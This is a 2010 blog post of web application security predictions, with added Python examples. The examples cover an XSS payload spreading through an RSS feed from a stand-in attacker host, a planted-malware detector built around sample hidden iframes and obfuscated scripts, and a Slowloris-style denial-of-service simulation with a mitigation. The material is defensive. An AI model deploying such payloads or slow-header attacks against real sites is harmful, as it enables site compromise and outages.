Monday, January 18, 2010

2010 Web Application Security Predictions

Submitted by Ryan Barnett 01/18/2010

It is always an interesting exercise to analyze web application security compromises and then try to predict what might happen next. Based on the data gathered by the
WASC Web Hacking Incident Database (WHID) and other resources such as DataLossDB, there are a few types of incidents that seem probable for the next 12 months.

Web-based worms will migrate off social networking sites
As we have seen from the previous sections, social networking web sites have fallen victim to web-based XSS/CSRF worms. These sites are a convenient testing ground for this type of attack: a large, highly connected user base and plenty of user-supplied content that is rendered back to other users. Attackers, however, would ideally like to move these attacks onto other types of web sites.

We believe that attackers will use Web 2.0 features such as RSS feeds, AJAX and widgets to propagate malicious code on other web sites: content syndicated from one site is rendered by many others, so a payload planted in a feed or widget can spread without the attacker touching each target directly. Probable targets, given the size of their user bases, are iPhone financial web apps such as:

  • Mint

  • Bank of America Online Banking

  • E*Trade Mobile

  • Bloomberg Mobile
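The following script is an added example, not code from the original post, of the propagation mechanism described above: a script payload planted once in a syndicated RSS item becomes live markup on every site whose widget renders the feed without output encoding, while a widget that HTML-escapes untrusted fields shows the same item as inert text. The feed XML, the attacker host and the site names are constructed for illustration.

```python
"""Added example: feed-borne XSS propagation through an embedding widget,
vulnerable renderer beside the hardened one. Feed content is constructed."""
import html
import xml.etree.ElementTree as ET

# Constructed feed: one benign item and one carrying a worm-style payload.
# In the XML the tags are entity-encoded, as a feed publisher would emit them;
# the parser turns them back into a literal <script> tag in the item text.
CONSTRUCTED_FEED = """<rss version="2.0"><channel><title>Example feed</title>
<item><title>Quarterly results</title><description>Revenue up 4%.</description></item>
<item><title>Hot tip</title><description>Click here &lt;script src="http://attacker.invalid/worm.js"&gt;&lt;/script&gt;</description></item>
</channel></rss>"""


def parse_items(feed_xml):
    """Return (title, description) pairs for each <item> in the feed."""
    root = ET.fromstring(feed_xml)
    return [(item.findtext("title", ""), item.findtext("description", ""))
            for item in root.iter("item")]


def render_unsafe(items):
    """Vulnerable widget: feed fields are concatenated straight into the page,
    so any markup in the feed becomes live markup on the embedding site."""
    return "<ul>" + "".join(f"<li><b>{t}</b>: {d}</li>" for t, d in items) + "</ul>"


def render_safe(items):
    """Hardened widget: every untrusted field is HTML-escaped before it is
    placed in the document, so the payload is displayed, not executed."""
    return "<ul>" + "".join(
        f"<li><b>{html.escape(t)}</b>: {html.escape(d)}</li>" for t, d in items
    ) + "</ul>"


def contains_live_script(rendered_html):
    """Crude comparison check: does the output contain an unescaped <script
    tag that a browser would parse and execute?"""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    items = parse_items(CONSTRUCTED_FEED)
    print("unsafe widget executes payload:", contains_live_script(render_unsafe(items)))
    print("safe widget executes payload:  ", contains_live_script(render_safe(items)))
```

Every site that embeds the feed with the unsafe renderer serves the payload to its own users, which is the propagation step; the fix lives in the embedding widget, not in the feed publisher the widget cannot control.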

Planting of malware will become a top concern

Organizations cannot afford to allow their web sites to serve malicious content to their customers. If this happens, consumer confidence will waver and customers may take their business elsewhere. Another impact is that high-profile search engines such as Google may flag the web site as malicious and warn users away from it, which negatively impacts Search Engine Optimization (SEO) efforts.

This is one of the scenarios that can directly affect the bottom line, including the stock price. Because of this risk, organizations will focus more effort on security capabilities that inspect outbound content, not just inbound requests, to ensure that what they serve is not malicious.
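As an added example, not from the original post, here is a minimal outbound-content inspector of the kind a WAF or reverse proxy could run over HTML responses before they reach the customer. It flags three injection patterns typical of planted malware: hidden iframes, script tags loading from hosts outside the site's own allowlist, and heavily obfuscated inline script. The allowlist, the hostnames and both sample response bodies are constructed.

```python
"""Added example: response-body inspection for planted malware indicators.
Allowed hosts and sample bodies are constructed; the patterns are heuristics,
not a complete malware signature set."""
import re

# Hosts this hypothetical site legitimately loads script from.
ALLOWED_SCRIPT_HOSTS = {"www.example-bank.invalid", "static.example-bank.invalid"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
HOST_RE = re.compile(r"^(?:https?:)?//([^/:?#]+)", re.I)
# Constructs that rarely appear together in legitimate inline script.
OBFUSCATION_RE = re.compile(
    r"(unescape\(|String\.fromCharCode|eval\(|\\x[0-9a-f]{2}|%u[0-9a-f]{4})", re.I)


def _is_hidden_iframe(tag):
    """Zero-sized or CSS-hidden iframes are the classic drive-by loader."""
    norm = re.sub(r"\s*=\s*", "=", tag.lower()).replace('"', "").replace("'", "")
    return any(m in norm for m in ("width=0", "height=0", "display:none",
                                   "visibility:hidden"))


def inspect_response(body):
    """Return a list of (indicator, evidence) findings for one HTML body.
    An empty list means nothing suspicious was seen."""
    findings = []
    for tag in IFRAME_RE.findall(body):
        if _is_hidden_iframe(tag):
            findings.append(("hidden_iframe", tag))
    for src in SCRIPT_SRC_RE.findall(body):
        host = HOST_RE.match(src)
        # Relative URLs load from this site and are not checked here.
        if host and host.group(1).lower() not in ALLOWED_SCRIPT_HOSTS:
            findings.append(("foreign_script", src))
    for code in INLINE_SCRIPT_RE.findall(body):
        if len(OBFUSCATION_RE.findall(code)) >= 2:
            findings.append(("obfuscated_script", code.strip()[:60]))
    return findings


# Constructed sample responses: the legitimate page, then the same page with
# the injected content a compromised site typically serves.
CLEAN_BODY = (
    '<html><head><script src="https://static.example-bank.invalid/app.js"></script>'
    '</head><body><h1>Welcome</h1>'
    '<iframe src="/help" width="300" height="200"></iframe></body></html>')

INFECTED_BODY = CLEAN_BODY.replace("</body>", (
    '<iframe src="http://evil.invalid/x.php" width="0" height="0" '
    'style="visibility:hidden"></iframe>'
    '<script>eval(unescape("%75%6e%65%73%63"))</script>'
    '<script src="http://cdn.evil.invalid/t.js"></script></body>'))

if __name__ == "__main__":
    for name, body in (("clean", CLEAN_BODY), ("infected", INFECTED_BODY)):
        print(name, inspect_response(body))
```

In a real deployment this check would sit on the response path with the rule set tuned against the site's own pages first; a hit should block the response and page the incident team, since the server itself is the thing that has been compromised.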

Attacks against web-based critical infrastructure components

It is no secret that terrorists and adversarial nation-states are seeking the capability to attack and disrupt critical infrastructure in the United States. Nuclear power plants, power grids and transportation control systems are all targets, and they share a common exposure: they often have web-based front-ends. Attackers are seeking to exploit web application flaws in those front-ends to obtain access to data, to shut systems down, or to cause a denial of service condition.

HTTP Denial of Service attacks will take down important sites

Whereas network-level DoS attacks aim to flood your pipe with lower-layer traffic (SYN floods, etc.), web application layer DoS attacks can often be achieved with far less traffic. Just take a look at RSnake's Slowloris tool for a perfect example of how fragile web server availability is: it opens many connections and sends partial HTTP headers very slowly, so each connection ties up a server worker without ever completing a request, and the whole worker pool is exhausted with only a trickle of bandwidth. The point is that the amount of traffic needed to cause an HTTP DoS condition is often far below what a network-level device would identify as anomalous, so it would not be reported the way a traditional network-level botnet DDoS attack would.
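The following simulation is an added example, not code from the original post or from the Slowloris tool, of why a slow-header attack needs so little bandwidth and of the mitigation that defeats it: a deadline on how long a connection may take to finish its request headers, counted from the first byte (the idea behind Apache's mod_reqtimeout RequestReadTimeout directive). The worker count, timings, connection names and byte strings are constructed; the model assumes the attacker does not reopen connections the server has closed, and with a reconnecting attacker the deadline still turns a permanent lock-out into a race for freed workers.

```python
"""Added example: worker-pool model of a Slowloris-style attack, with and
without a header-read deadline. All parameters are constructed."""


class Server:
    """A connection occupies a worker from its first byte until the request
    headers end with a blank line (CRLFCRLF). With no deadline, a client that
    never finishes its headers holds that worker forever."""

    def __init__(self, workers, header_deadline=None):
        self.workers = workers
        self.header_deadline = header_deadline  # seconds, or None for no limit
        self.active = {}      # conn_id -> (first_byte_time, buffered header bytes)
        self.closed = set()   # connections the server has dropped
        self.rejected = 0
        self.timed_out = 0
        self.completed = 0

    def on_data(self, conn_id, now, data):
        """Feed bytes for a connection. Returns True if accepted/progressed,
        False if no worker was free, None if the socket was already closed."""
        self._expire(now)
        if conn_id in self.closed:
            return None
        if conn_id not in self.active:
            if len(self.active) >= self.workers:
                self.rejected += 1          # no free worker: client is refused
                return False
            self.active[conn_id] = (now, b"")
        start, buf = self.active[conn_id]
        buf += data
        if b"\r\n\r\n" in buf:
            del self.active[conn_id]        # headers complete: worker freed
            self.completed += 1
        else:
            self.active[conn_id] = (start, buf)
        return True

    def _expire(self, now):
        """Drop connections whose headers are still incomplete past the
        deadline, measured from the first byte (keepalive bytes do not reset it)."""
        if self.header_deadline is None:
            return
        for cid, (start, _) in list(self.active.items()):
            if now - start > self.header_deadline:
                del self.active[cid]
                self.closed.add(cid)
                self.timed_out += 1


WORKERS = 256
ATTACK_CONNS = 300
KEEPALIVE = b"X-a: b\r\n"        # one more header line, never the blank line
KEEPALIVE_INTERVAL = 10          # seconds between keepalive lines


def attack_bandwidth_bytes_per_sec(connections=WORKERS):
    """Steady-state traffic needed to keep the whole worker pool occupied."""
    return connections * len(KEEPALIVE) / KEEPALIVE_INTERVAL


def simulate(header_deadline, duration=60):
    """Attacker opens ATTACK_CONNS slow connections at t=0; a legitimate user
    sends a complete request at t=30. Returns whether the user was served."""
    srv = Server(WORKERS, header_deadline)
    events, seq = [], 0
    for c in range(ATTACK_CONNS):
        events.append((0.0, seq, f"atk{c}", b"GET / HTTP/1.1\r\nHost: victim\r\n")); seq += 1
        for k in range(1, duration // KEEPALIVE_INTERVAL + 1):
            events.append((float(k * KEEPALIVE_INTERVAL), seq, f"atk{c}", KEEPALIVE)); seq += 1
    events.append((30.0, seq, "legit", b"GET /login HTTP/1.1\r\nHost: victim\r\n\r\n"))
    legit_served = None
    for t, _, cid, data in sorted(events):
        ok = srv.on_data(cid, t, data)
        if cid == "legit":
            legit_served = ok
    return {"legit_served": legit_served, "completed": srv.completed,
            "timed_out": srv.timed_out, "busy_workers": len(srv.active)}


if __name__ == "__main__":
    print("attack bandwidth (bytes/s):", attack_bandwidth_bytes_per_sec())
    print("no deadline:", simulate(None))
    print("20 s deadline:", simulate(20))
```

Roughly 200 bytes per second is enough to hold 256 workers in this model, which is why a bandwidth-based anomaly threshold never fires; the deadline works because it is measured per connection from the first byte rather than from the last byte received.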

Network DDoS attacks aimed at web sites can still be effective under the right circumstances, but there are web application specific attacks that are far more effective while requiring much less traffic. Odds are that a number of high-profile web sites will be knocked offline during 2010.